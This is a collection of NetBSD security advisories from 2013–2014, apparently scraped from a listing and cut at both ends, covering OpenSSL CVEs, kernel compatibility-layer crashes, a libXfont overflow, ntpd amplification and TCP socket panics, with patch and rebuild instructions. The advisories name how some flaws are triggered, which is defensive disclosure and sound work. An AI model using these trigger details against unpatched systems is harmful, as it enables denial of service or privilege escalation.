rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), KERNCONF with the name of your kernel configuration file and VERSION with the file version below File versions containing the fixes: FILE HEAD netbsd-7 netbsd-6 netbsd-6-1 netbsd-6-0 -- -- sys/netinet6/ip6_output.c 1.158 1.157.2.1 1.145.2.1 1.145.8.1 1.145.6.1 FILE netbsd-5 netbsd-5-2 netbsd-5-1 -- -- sys/netinet6/ip6_output.c 1.135.2.21.135.2.1.10.1 1.135.2.1.6.1 To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P -r VERSION sys/netinet6/ip6_output.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: http://www.NetBSD.org/guide/en/chap-kernel.html Thanks To = Thanks to Maxime Villard for developing a code scanner which detected the issue, and Ryota Ozaki for helping in developing a fix. Revision History 2014-09-08 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2014-012.txt.asc Information about NetBSD and NetBSD security can be found at http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ . Copyright 2014, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $NetBSD: NetBSD-SA2014-012.txt,v 1.1 2014/09/08 21:18:53 tonnerre Exp $ -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBAgAGBQJUDh1JAAoJEAZJc6xMSnBuHwUP/3OPLYDozc7WuD+zFjhQaSzr 82ClbsCHvjTz+DdJ/jOXsQLK9GQI61jfqWxdB8uwUl5S+bel/Tcz/DUgtFdhOxT0 +xQ2AwgNnkMz4fnfobdVnUT6GSa+U4UJPjVytTqstTMdJLik8EawJookLL7hAFdc l7usjjWkM0Gemzu6js1RGPFynvyFkSYBTXJGr5pJQbnpZkC0HtKqe/svquJYFe3a TxddHAOMkxfNSrf0Wn8vBWeaTQ7Vc70ZJ/ZuxiczZsE/5Voq+ois73u0uAknCCu+ 6lk2Tm3OmkK0mE25Q4iXRtPw0ogOmRa5RfyzYSWLvQ5cD5S0GrqQYrYAFAdHxaGV LUSP4FmWTKYi/JOjTlgUKjFpysQANbY6o6NTCJeKnNfkcZBQZpe3xIC74mQaSGgv fAhZ7s//ZY+jeusl/GAbA00rQLG3BPFXjSFyfL8NW//sWsZqd6YXV51YLJMTIVVm Up2j7EUCszWKQWqIQjRtnl09ZaWBdr3i+3tpOa78elg5v1zuCFohQK0uB3v+klEU xSsuvgwqzVnVjBniG3NNk+RSnaaTE8JGwgtAo8wGdjpLNkye6xQEzZW/3F7S9fXW qX+Rm4aXspf9hINChCjOSzs/576ffmpsypE8PvDYPgbV6EjRC2pO4wq3IbuZGI4R C7h9rpPfO6GxW3oKjMOb =RKxi -END PGP SIGNATURE-
NetBSD Security Advisory 2014-008: Multiple OpenSSL vulnerabilities (updated)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2014-008 = Topic: Multiple OpenSSL vulnerabilities Version:NetBSD-current: prior to Aug 10th, 2014 NetBSD 6.1 - 6.1.4: affected NetBSD 6.0 - 6.0.5: affected NetBSD 5.1 - 5.1.4: partially affected NetBSD 5.2 - 5.2.2: partially affected Severity: MitM, Remote Code Execution, Remote DoS, Local Information Leak Fixed: NetBSD-current: Aug 10th, 2014 NetBSD-6-0 branch: Aug 16th, 2014 NetBSD-6-1 branch: Aug 16th, 2014 NetBSD-6 branch:Aug 16th, 2014 NetBSD-5-2 branch: Aug 28th, 2014 NetBSD-5-1 branch: Aug 28th, 2014 NetBSD-5 branch:Aug 28th, 2014 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract Information leak in pretty printing functions (CVE-2014-3508) Double Free when processing DTLS packets (CVE-2014-3505) DTLS memory exhaustion (CVE-2014-3506) DTLS memory leak from zero-length fragments (CVE-2014-3507) OpenSSL DTLS anonymous EC(DH) denial of service (CVE-2014-3510) Race condition in ssl_parse_serverhello_tlsext (CVE-2014-3509) OpenSSL TLS protocol downgrade attack (CVE-2014-3511) only in NetBSD-6 and NetBSD-current: Crash with SRP ciphersuite in Server Hello message (CVE-2014-5139) SRP buffer overrun (CVE-2014-3512) Technical Details = See http://www.openssl.org/news/secadv_20140806.txt Solutions and Workarounds = Update the OpenSSL libraries and make sure the old libssl and libcrypto are no longer used. - From source: +--- Update src and rebuild and install. Note: OpenSSL in NetBSD-6 and NetBSD-current has been updated to version 1.0.1i; updating the entire src tree is recommended. - From tarballs: +- To obtain fixed binaries, fetch the appropriate base.tgz and comp.tgz from a daily build later than the fix dates, from http://nyftp.netbsd.org/pub/NetBSD-daily/rel/date/arch/binary/sets/ with a date 20140828* or larger, and your release version and architecture (e.g. http://nyftp.netbsd.org/pub/NetBSD-daily/netbsd-6-1/201408280100Z/amd64/binary/sets/), and then extract the files: Shared libraries: tar xzpf base.tgz \*libssl\* \*libcrypto\* And static libraries and linker config files: tar xzpf comp.tgz \*libssl\* \*libcrypto\* Get the fixed library into use +- Since the vulnerability is in a shared library, getting the old library purged and the fixed one into use requires restarting all programs that load libssl and libcrypto. The easiest way to do this is to reboot the system. Another method: using /bin/sh, ps ax -o pid | (while read pid; do \ pmap $pid | egrep '(libssl|libcrypto)' echo found $pid ;\ done) will find non-chrooted programs that have the affected libraries open; restart them. sshd will not show up in this list since it runs chrooted and re-exec'ed but also needs to be restartet. ldd programname will show the shared libraries a programs is wont to use. Lastly, remove the vulnerable libraries to make sure they won't get used accidentially: rm /usr/lib/libssl.so.10.3 /lib/libcrypto.so.8.2 /usr/lib/libcrypto.so.8.2 Fixed versions -- files relative to src/crypto/external/bsd/openssl/dist/ssl branch d1_both.ct1_lib.c s3_clnt.cs23_srvr.c -- --- --- --- netbsd-6-0 1.1.1.4.4.1.4.3 1.5.4.1.4.3 1.4.4.1.4.3 1.1.1.3.10.1 netbsd-6-1 1.1.1.4.4.1.6.3 1.5.4.1.6.3 .4.4.1.6.3 1.1.1.3.18.1 netbsd-61.1.1.4.4.4 1.5.4.4 1.4.4.4 1.1.1.3.4.1 HEAD1.1.1.9 1.13 1.10 1.1.1.4 files relative to src/crypto/external/bsd/openssl/dist/crypto branch asn1/a_object.c objects/obj_dat.c srp/srp_lib.c -- --- - - netbsd-6-0 1.1.1.3.4.1.4.1 1.1.1.2.14.1 1.1.1.1.10.2 netbsd-6-1 1.1.1.3.4.1.6.1 1.1.1.2.22.1 1.1.1.1.18.2 netbsd-61.1.1.3.4.2 1.1.1.2.8.11.1.1.1.4.2 HEAD1.1.1.5 1.1.1.31.1.1.3 files relative to crypto/dist/openssl/ssl branch d1_both.ct1_lib.c s3_clnt.c s23_srvr.c -- --- --- netbsd-5-1 1.3.4.2.2.2 1.2.12.4 1.12.4.2.2.3 1.6.12.1 netbsd-5-2 1.3.4.2.6.2 1.2.4.3.2.1 1.12.4.3.4.2 1.6.2.1 netbsd-51.3.4.4 1.2.4.4 1.12.4.5 1.6.4.1 files relative to crypto/dist/openssl/crypto branch asn1/a_object.c asn1/asn1.h
NetBSD Security Advisory 2014-008: Multiple OpenSSL vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2014-008 = Topic: Multiple OpenSSL vulnerabilities Version:NetBSD-current: prior to Aug 10th, 2014 NetBSD 6.1 - 6.1.4: affected NetBSD 6.0 - 6.0.5: affected NetBSD 5.1 - 5.1.4: partially affected NetBSD 5.2 - 5.2.2: partially affected Severity: MitM, Remote Code Execution, Remote DoS, Local Information Leak Fixed: NetBSD-current: Aug 10th, 2014 NetBSD-6-0 branch: Aug 11th, 2014 NetBSD-6-1 branch: Aug 11th, 2014 NetBSD-6 branch:Aug 11th, 2014 NetBSD-5-2 branch: Aug 11th, 2014 NetBSD-5-1 branch: Aug 11th, 2014 NetBSD-5 branch:Aug 11th, 2014 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract Information leak in pretty printing functions (CVE-2014-3508) Double Free when processing DTLS packets (CVE-2014-3505) DTLS memory exhaustion (CVE-2014-3506) DTLS memory leak from zero-length fragments (CVE-2014-3507) OpenSSL DTLS anonymous EC(DH) denial of service (CVE-2014-3510) Race condition in ssl_parse_serverhello_tlsext (CVE-2014-3509) OpenSSL TLS protocol downgrade attack (CVE-2014-3511) only in NetBSD-6 and NetBSD-current: Crash with SRP ciphersuite in Server Hello message (CVE-2014-5139) SRP buffer overrun (CVE-2014-3512) Technical Details = See http://www.openssl.org/news/secadv_20140806.txt Solutions and Workarounds = Update the OpenSSL libraries and make sure the old libssl and libcrypto are no longer used. - From source: - Update src and rebuild and install. Note: OpenSSL in NetBSD-6 and NetBSD-current has been updated to version 1.0.1h; updating the entire src tree is recommended. - From tarballs: - -- To obtain fixed binaries, fetch the appropriate base.tgz and comp.tgz from a daily build later than the fix dates, from http://nyftp.netbsd.org/pub/NetBSD-daily/rel/date/arch/binary/sets/ with a date 20140812* or larger, and your release version and architecture (e.g. http://nyftp.netbsd.org/pub/NetBSD-daily/netbsd-6-1/201408140100Z/amd64/binary/sets/), and then extract the files: Shared libraries: tar xzpf base.tgz \*libssl\* \*libcrypto\* And static libraries and linker config files: tar xzpf comp.tgz \*libssl\* \*libcrypto\* Get the fixed library into use - -- Since the vulnerability is in a shared library, getting the old library purged and the fixed one into use requires restarting all programs that load libssl and libcrypto. The easiest way to do this is to reboot the system. Another method: using /bin/sh, ps ax -o pid | (while read pid; do \ pmap $pid | egrep '(libssl|libcrypto)' echo found $pid ;\ done) will find non-chrooted programs that have the affected libraries open; restart them. sshd will not show up in this list since it runs chrooted and re-exec'ed but also needs to be restartet. ldd programname will show the shared libraries a programs is wont to use. Lastly, remove the vulnerable libraries to make sure they won't get used accidentially: rm /usr/lib/libssl.so.10.3 /lib/libcrypto.so.8.2 /usr/lib/libcrypto.so.8.2 Fixed versions - -- files relative to src/crypto/external/bsd/openssl/dist/ssl branch d1_both.ct1_lib.c s3_clnt.cs23_srvr.c - -- --- --- --- netbsd-6-0 1.1.1.4.4.1.4.2 1.4.4.1.4.2 1.9.4.1.4.2 1.10.2.1.4.2 netbsd-6-1 1.1.1.4.4.1.6.2 1.4.4.1.6.2 1.9.4.1.6.2 1.10.2.1.6.2 netbsd-61.1.1.4.4.3 1.4.4.3 1.9.4.3 1.10.2.3 HEAD1.1.1.8 1.9 1.16 1.16 files relative to src/crypto/external/bsd/openssl/dist/crypto branch asn1/a_object.c objects/obj_dat.c srp/srp_lib.c - -- --- - - netbsd-6-0 1.1.1.4.4.1.4.2 1.4.4.1.4.21.9.4.1.4.2 netbsd-6-1 1.1.1.4.4.1.6.2 1.4.4.1.6.21.9.4.1.6.2 netbsd-61.1.1.4.4.3 1.4.4.31.9.4.3 HEAD1.1.1.8 1.91.16 files relative to crypto/dist/openssl/ssl branch d1_both.ct1_lib.c s3_clnt.cs23_srvr.c - -- --- --- --- netbsd-5-1 1.1.1.4.4.1.4.2 1.4.4.1.4.2 1.9.4.1.4.2 1.10.2.1.4.2 netbsd-5-2 1.1.1.4.4.1.6.2 1.4.4.1.6.2 1.9.4.1.6.2 1.10.2.1.6.2 netbsd-51.1.1.4.4.3 1.4.4.3 1.9.4.3 1.10.2.3 files relative to crypto/dist/openssl/crypto branch asn1/a_object.c objects/obj_dat.c srp/srp_lib.c -
NetBSD Security Advisory 2014-010: Multiple vulnerabilities in the compatibility layers
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2014-010 = Topic: Multiple vulnerabilities in the compatibility layers Version:NetBSD-current: source prior to Tue, Apr 15th 2014 NetBSD 6.1 - 6.1.4: affected NetBSD 6.0 - 6.0.5: affected NetBSD 5.1 - 5.1.4: affected NetBSD 5.2 - 5.2.2: affected Severity: Local DoS Fixed: NetBSD-current: Tue, Apr 15th 2014 NetBSD-6-0 branch: Mon, Apr 21th 2014 NetBSD-6-1 branch: Mon, Apr 21th 2014 NetBSD-6 branch:Mon, Apr 21th 2014 NetBSD-5-2 branch: Wed, May 14th 2014 NetBSD-5-1 branch: Wed, May 14th 2014 NetBSD-5 branch:Wed, May 14th 2014 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract Four compatibility layers are affected by several vulnerabilities: 1) FreeBSD compatibility: NULL pointer dereference 2) NetBSD 32-bit compatibility: Zero-sized memory allocation 3) Digital UNIX (formerly OSF/1) compatibility: Zero-sized memory allocation 4) Linux and Linux 32-bit compatibility: User-controllable kernel memory array index. Each of them allows a local user to crash the system. Technical Details = For more clarity the four layers affected will be referred to as COMPAT_xx, where xx is the emulated system. 1) Due to a programming mistake in COMPAT_FREEBSD, a simple call to the sched_getparam system call would cause the kernel to dereference a NULL pointer, and thus to crash. 2) Due to a missing input validation check in COMPAT_NETBSD32's kevent system call, a user could cause the kernel to perform a zero-sized memory allocation, resulting in a crash. 3) Due to a missing input validation check in COMPAT_OSF1's getdirentries system call, a user could cause the kernel to perform a zero-sized memory allocation, resulting in a crash. 4) Due to missing input validation checks in the COMPAT_LINUX and COMPAT_LINUX32 ELF binary loader, a specially-crafted binary could control a kernel memory array index - address from which data is read. Attempting to read at an unmapped memory page will cause the kernel to crash. Solutions and Workarounds = - - Disable the compability modules - - You can achieve this with the modunload(8) tool. Please read the appropriate manual page. For example, you can disable the Linux modules by moving the kernel object files out of the way. These are located in: /stand/${MACHINE_ARCH}/${KERNEL_VERSION}/modules/compat_${NAME}/compat_${NAME}.kmod And running the following command to unload them: # modunload compat_${NAME} The modules have dependencies, so you need to unload them in the proper order. You can also disable these modules by rebuilding your kernel without the COMPAT_${NAME} options. Note however that it is to be considered as a temporary workaround, and you are strongly advised to fix your system from source. - - Fix from source - - For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), KERNCONF with the name of your kernel configuration file and VERSION with the file version below File versions containing the fixes: FILE HEAD netbsd-6 netbsd-6-1 netbsd-6-0 netbsd-5 netbsd-5-2 netbsd-5-1 - -- -- -- -- src/sys/compat/freebsd/freebsd_sched.c 1.20 1.19.40.1 1.19.56.1 1.19.46.1 1.19.10.1 1.19.48.1 1.19.24.1 src/sys/compat/netbsd32/netbsd32_compat_50.c 1.24 1.20.6.1 1.20.14.1 1.20.12.1 XX XX src/sys/compat/netbsd32/netbsd32_event.c 1.11 1.9.10.2 1.9.24.11.9.16.1 XX XX src/sys/compat/osf1/osf1_file.c 1.42 % % % XX XX src/sys/compat/linux/common/linux_exec_elf32.c 1.91 1.86.2.1 1.86.16.1 1.86.8.11.81.10.1 1.81.20.1 1.81.16.1 To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P -r VERSION sys/compat/freebsd/freebsd_sched.c # cvs update -d -P -r VERSION
NetBSD Security Advisory 2014-006: Multiple OpenSSL vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2014-006 = Topic: Multiple OpenSSL vulnerabilities Version:NetBSD-current: June 5th, 2014 NetBSD 6.1 - 6.1.4: affected NetBSD 6.0 - 6.0.5: affected NetBSD 5.1 - 5.1.4: affected NetBSD 5.2 - 5.2.2: affected Severity: MitM, Remote Code Execution, Remote DoS Fixed: NetBSD-current: June 5th, 2014 NetBSD-6-0 branch: June 6th, 2014 NetBSD-6-1 branch: June 6th, 2014 NetBSD-6 branch:June 6th, 2014 NetBSD-5-2 branch: June 6th, 2014 NetBSD-5-1 branch: June 6th, 2014 NetBSD-5 branch:June 6th, 2014 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract SSL/TLS MITM vulnerability (CVE-2014-0224) DTLS recursion flaw (CVE-2014-0221) DTLS invalid fragment vulnerability (CVE-2014-0195) Anonymous ECDH denial of service (CVE-2014-3470) only in NetBSD-6 and NetBSD-current: SSL_MODE_RELEASE_BUFFERS NULL pointer dereference (CVE-2014-0198) SSL_MODE_RELEASE_BUFFERS session injection or denial of service (CVE-2010-5298) only in NetBSD-5 (previously fixed in NetBSD-6 and NetBSD-current): Recovering OpenSSL ECDSA Nonces Using the FLUSH+RELOAD Cache Side-channel Attack (CVE-2014-0076) Technical Details = See http://www.openssl.org/news/secadv_20140605.txt Solutions and Workarounds = Update the OpenSSL libraries and make sure the old libssl and libcrypto are no longer used. - From source: - Update src and rebuild and install. Note: OpenSSL in NetBSD-6 and NetBSD-current has been updated to version 1.0.1h; updating the entire src tree is recommended. - From tarballs: - -- The NetBSD build cluster is currently undergoing hardware maintenance; it may be a while before builds run again. To obtain fixed binaries, fetch the appropriate base.tgz and comp.tgz from a daily build later than the fix dates, from http://nyftp.netbsd.org/pub/NetBSD-daily/rel/date/arch/binary/sets/ with a date 20140607* or larger, and your release version and architecture (e.g. http://nyftp.netbsd.org/pub/NetBSD-daily/netbsd-6-1/201406070100Z/amd64/binary/sets/), and then extract the files: Shared libraries: tar xzpf base.tgz \*libssl\* \*libcrypto\* And static libraries and linker config files: tar xzpf comp.tgz \*libssl\* \*libcrypto\* Get the fixed library into use - -- Since the vulnerability is in a shared library, getting the old library purged and the fixed one into use requires restarting all programs that load libssl and libcrypto. The easiest way to do this is to reboot the system. Another method: using /bin/sh, ps ax -o pid | (while read pid; do \ pmap $pid | egrep '(libssl|libcrypto)' echo found $pid ;\ done) will find non-chrooted programs that have the affected libraries open; restart them. sshd will not show up in this list since it runs chrooted and re-exec'ed but also needs to be restartet. ldd programname will show the shared libraries a programs is wont to use. Lastly, remove the vulnerable library to make sure it won't get used accidentially: rm /usr/lib/libssl.so.10.0 Fixed versions - -- files relative to src/crypto/external/bsd/openssl/dist/ssl branch d1_both.c s3_clnt.c s3_pkt.cs3_srvr.cssl3.h - -- --- --- --- -- netbsd-6-0 1.1.1.4.4.1.4.2 1.4.4.1.4.2 1.9.4.1.4.2 1.10.2.1.4.2 1.2.2.1.4.2 netbsd-6-1 1.1.1.4.4.1.6.2 1.4.4.1.6.2 1.9.4.1.6.2 1.10.2.1.6.2 1.2.2.1.6.2 netbsd-61.1.1.4.4.3 1.4.4.3 1.9.4.3 1.10.2.3 1.2.2.3 HEAD1.1.1.8 1.9 1.161.16 1.6 files relative to crypto/dist/openssl/ssl branch d1_both.cs3_clnt.c s3_pkt.c s3_srvr.c ssl3.h - -- --- --- netbsd-5-1 1.3.4.2.2.1 1.12.4.2.2.2 1.9.4.3.2.1 1.15.4.3.2.2 1.8.12.1 netbsd-5-2 1.3.4.2.6.1 1.12.4.3.4.1 1.9.4.3.6.1 1.15.4.4.4.1 1.8.2.1 netbsd-51.3.4.3 1.12.4.4 1.9.4.4 1.15.4.5 1.8.4.1 files relative to crypto/dist/openssl/crypto branch bn/bn.hbn/bn_lib.c ec/ec2_mult.c - -- - --- - netbsd-5-1 1.12.12.1 1.7.12.1 1.1.1.2.12.1 netbsd-5-2 1.12.2.1 1.7.2.1 1.1.1.2.2.1 netbsd-51.12.4.1 1.7.4.1 1.1.1.2.4.1 Thanks To = The OpenSSL team acknowledges: KIKUCHI Masashi (Lepidum Co. Ltd.) for CVE-2014-0224 Imre Rad (Search-Lab Ltd.) for CVE-2014-0221 Jüri Aedla for
NetBSD Security Advisory 2014-001: Stack buffer overflow in libXfont
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2014-001 = Topic: Stack buffer overflow in libXfont Version:NetBSD-current: source prior to Tue 7th, 2014 NetBSD 6.1: affected NetBSD 6.0 - 6.0.2: affected NetBSD 5.1 - 5.1.2: affected NetBSD 5.2: affected Severity: privilege escalation Fixed: NetBSD-current: Tue 7th, 2014 NetBSD-6-0 branch: Tue 7th, 2014 NetBSD-6-1 branch: Tue 7th, 2014 NetBSD-6 branch:Tue 7th, 2014 NetBSD-5-2 branch: Tue 7th, 2014 NetBSD-5-1 branch: Tue 7th, 2014 NetBSD-5 branch:Tue 7th, 2014 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract A stack buffer overflow in parsing of BDF font files in libXfont was found that can easily be used to crash X programs using libXfont, and likely could be exploited to run code with the privileges of the X program (most nostably, the X server, commonly running as root). This vulnerability has been assigned CVE-2013-6462 Technical Details = - From the X.org advisory: Scanning of the libXfont sources with the cppcheck static analyzer included a report of: [lib/libXfont/src/bitmap/bdfread.c:341]: (warning) scanf without field width limits can crash with huge input data. Evaluation of this report by X.Org developers concluded that a BDF font file containing a longer than expected string could overflow the buffer on the stack. Testing in X servers built with Stack Protector resulted in an immediate crash when reading a user-provided specially crafted font. As libXfont is used to read user-specified font files in all X servers distributed by X.Org, including the Xorg server which is often run with root privileges or as setuid-root in order to access hardware, this bug may lead to an unprivileged user acquiring root privileges in some systems. This bug appears to have been introduced in the initial RCS version 1.1 checked in on 1991/05/10, and is thus believed to be present in every X11 release starting with X11R5 up to the current libXfont 1.4.6. (Manual inspection shows it is present in the sources from the X11R5 tarballs, but not in those from the X11R4 tarballs.) Solutions and Workarounds = Workaround: restrict access to the X server. Solutions: a fix is included in the following versions: xorg: xsrc/external/mit/libXfont/dist/src/bitmap/bdfread.c HEAD1.3 netbsd-61.1.1.2.2.1 netbsd-6-1 1.1.1.2.6.1 netbsd-6-0 1.1.1.2.4.1 netbsd-51.1.1.1.2.2 netbsd-5-2 1.1.1.1.2.1.4.1 netbsd-5-1 1.1.1.1.2.1.2.1 xfree: xsrc/xfree/xc/lib/font/bitmap/bdfread.c HEAD1.4 netbsd-61.2.8.1 netbsd-6-1 1.2.14.1 netbsd-6-0 1.2.10.1 netbsd-51.2.2.1 netbsd-5-2 1.2.12.1 netbsd-5-1 1.2.6.1 To obtain fixed binaries, fetch the appropriate xbase.tgz from a daily build later than the fix dates, i.e. http://nyftp.netbsd.org/pub/NetBSD-daily/rel/date/arch/binary/sets/xbase.tgz with a date 20140108* or larger, and your release version and architecture, and then extract the libXfont shared library files: for X.org environments, netbsd-6* and HEAD: cd / tar xzpf /path/to/xbase.tgz ./usr/X11R7/lib/libXfont.so \ ./usr/X11R7/lib/libXfont.so.3 \ ./usr/X11R7/lib/libXfont.so.3.0 for X.org environments and netbsd-5*: cd / tar xzpf /path/to/xbase.tgz ./usr/X11R7/lib/libXfont.so \ ./usr/X11R7/lib/libXfont.so.2 \ ./usr/X11R7/lib/libXfont.so.2.0 and for xfree environments: cd / tar xzpf /path/to/xbase.tgz ./usr/X11R6/lib/libXfont.so \ ./usr/X11R6/lib/libXfont.so.1 \ ./usr/X11R6/lib/libXfont.so.1.5 To build from source, update bdfread.c to the appropriate version and then ./build.sh -x from the top of the src tree. Thanks To = X.Org thanks the authors of the cppcheck tool for making their static analyzer available as an open source project we can all benefit from. http://cppcheck.sourceforge.net/ NetBSD would like to thank X.org for looking for and fixing this vulnerability. Revision History 2014-01-07 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at
NetBSD Security Advisory 2014-002: ntpd used as DDoS amplifier
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2014-002 = Topic: ntpd used as DDoS amplifier Version:NetBSD-current: source prior to Dec 27th, 2013 NetBSD 6.1: affected NetBSD 6.0 - 6.0.2: affected NetBSD 5.1 - 5.1.2: affected NetBSD 5.2: affected Severity: DDoS participation Fixed: NetBSD-current: Dec 27th, 2013 NetBSD-6-0 branch: Jan 6th, 2014 NetBSD-6-1 branch: Jan 6th, 2014 NetBSD-6 branch:Jan 6th, 2014 NetBSD-5-2 branch: Jan 6th, 2014 NetBSD-5-1 branch: Jan 6th, 2014 NetBSD-5 branch:Jan 6th, 2014 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract An administrative query function is getting used by attackers to use ntp servers as traffic amplifiers. The new version no longer offers this query option. Technical Details = The monlist function, which is available in ntp prior to 4.2.7 to requestors who are allowed to 'query', yields potentially sizeable traffic in response to a small query packet, and can thus get used for amplification attacks. Solutions and Workarounds = Workaround: in ntp.conf, setting 'restrict default noquery' will prevent amplification to random targets (the remaining targets would be those allowed to query by their own restrict entries). Note that this setting does not disallow time synchronization, but instead querying for the list of peers and other administrative and informative data. See /usr/share/doc/html/ntp/accopt.html for information on ntpd access control configuration options. Solution: Updating the ntpd binary so it no longer offers the abused function, as well as updating ntp.conf so it offers less attack surface. ntpd source: update to HEADsrc/external/bsd/ntp/dist/ntpd/ntp_request.c netbsd-6src/external/bsd/ntp/dist/ntpd/ntp_request.c 1.7.2.1 netbsd-6-1 src/external/bsd/ntp/dist/ntpd/ntp_request.c 1.7.16.1 netbsd-6-0 src/external/bsd/ntp/dist/ntpd/ntp_request.c 1.7.8.1 netbsd-5src/dist/ntp/ntpd/ntp_request.c 1.8.4.2 netbsd-5-2 src/dist/ntp/ntpd/ntp_request.c 1.8.4.1.6.1 netbsd-5-1 src/dist/ntp/ntpd/ntp_request.c 1.8.4.1.2.1 default configuration file update: HEADsrc/etc/ntp.conf 1.18 netbsd-6src/etc/ntp.conf 1.14.2.1 netbsd-6-1 src/etc/ntp.conf 1.14.16.1 netbsd-6-0 src/etc/ntp.conf 1.14.8.1 netbsd-5src/etc/ntp.conf 1.9.20.1 netbsd-5-2 src/etc/ntp.conf 1.9.36.1 netbsd-5-1 src/etc/ntp.conf 1.9.28.1 Thanks To = Thanks to Erik Fair for bringing the issue to our attention and suggesting a fix. Revision History 2014-01-07 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2014-002.txt.asc Information about NetBSD and NetBSD security can be found at http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ . Copyright 2014, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $NetBSD: NetBSD-SA2014-002.txt,v 1.2 2014/01/07 21:04:33 tonnerre Exp $ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.15 (NetBSD) iQIcBAEBAgAGBQJSzGwhAAoJEAZJc6xMSnBuQX4P/j3dERFgvL95fxrHQViQlv9k G9G+IRFnvFdR1NvEY2j+qsLPW2zLIzBWdAODsHekgcnkQd3NXuwjo2pojC99SEkX kuGGyxo0RxuH98iQAco6rAqLsePkHYXxWwYPkLhKflPi4XUyb2ApWwh+O83ac/dg ochBbSIkjmKOX7w2isFP0NDiTi9AsgSWjsKj/MhRMhHpMHKqV6AaOmgwyZavntL3 73dnrfFLTdY54ZkyVRdS/6rgqPDACA9V1nLeGvdRovBWyyIcB/J+9g1xzWapnydm SNHN6mW0I1uFPx5equERwRkI1Vz68tfQwvf3VWEFkx1vTHJ+cF94P4RVz1WFwxKu tEwxpTuZCdUXEKCPmjd74Eo3Wgy2JHGgmpNvmwiOEfLHtHvwtZn05GxtLeGlb77k BNX8/MWmMNYqOARr3EXIgIxCdZgozhzXBXqqiUhM9gSCJykS9RdSbQYudrtHkXYM e3HcKsSTBDVwwBkca7UAncFcqCBKosd2dIrR9NaCe8aY+ZXt4RR3y4ipi686cvnC 9PSbp2PAIcb83CNKprglxceIZD93KZj37H8tW2IPmCrrjGXDqB4s4vXpEAwcxlNf RlMATwqz7ZmCIybg1/MI1E4/j/1EWHES/w9OAUvhCPk6WPIRpT5Zxv6MKE7XNleB NdDEOoZ4KpVo4ereausV =8eAi -END PGP SIGNATURE-
NetBSD Security Advisory 2013-011: embryonic TCP sockets local DoS
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2013-011 = Topic: embryonic TCP sockets local DoS Version:NetBSD-current: source prior to Nov 2nd, 2013 NetBSD 6.1 - 6.1.2: affected NetBSD 6.0 - 6.0.2: affected NetBSD 5.1 - 5.1.2: not affected NetBSD 5.2: not affected Severity: local DoS Fixed: NetBSD-current: Nov 2nd, 2013 NetBSD-6-0 branch: Nov 25th, 2013 NetBSD-6-1 branch: Nov 25th, 2013 NetBSD-6 branch:Nov 25th, 2013 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract Recently two vulnerabilities in the area of embryonic sockets have been fixed. Both issues are due to a socket not having credentials set during a very short timeframe of its creation, and can lead to a user causing a panic by timing a tcpdrop just right. Technical Details = The network code adds new connections to the connection table in an interrupt and references a socket from this table. The socket is also added to the accept queue of the listening socket. At this point the socket has no credentials, but tcpdrop can find it in the connection table and crash the system, for the first issue by looking up its credentials and hitting an assertion, and in the second version by referencing a NULL pointer. Solutions and Workarounds = Install and reboot to a kernel containing the fixes. The fastest way to do that, if you are running or can run a standard kernel built as part of the NetBSD release process, is to obtain the corresponding kernel from the daily NetBSD autobuild output and install it on your system. You can obtain such kernels from http://nyftp.netbsd.org/pub/NetBSD-daily/ where they are sorted by NetBSD branch, date, and architecture. To fix a system running e.g. NetBSD 6.0 or the stable NetBSD 6.0 branch, the most appropriate kernel will be the netbsd-6-0 kernel. To fix a system running NetBSD-current, the HEAD kernel should be used. In all cases, a kernel from an autobuild dated newer than the fix date for the branch you are using must be used to fix the problem. If you cannot use the autobuilt kernels, then for all affected NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the 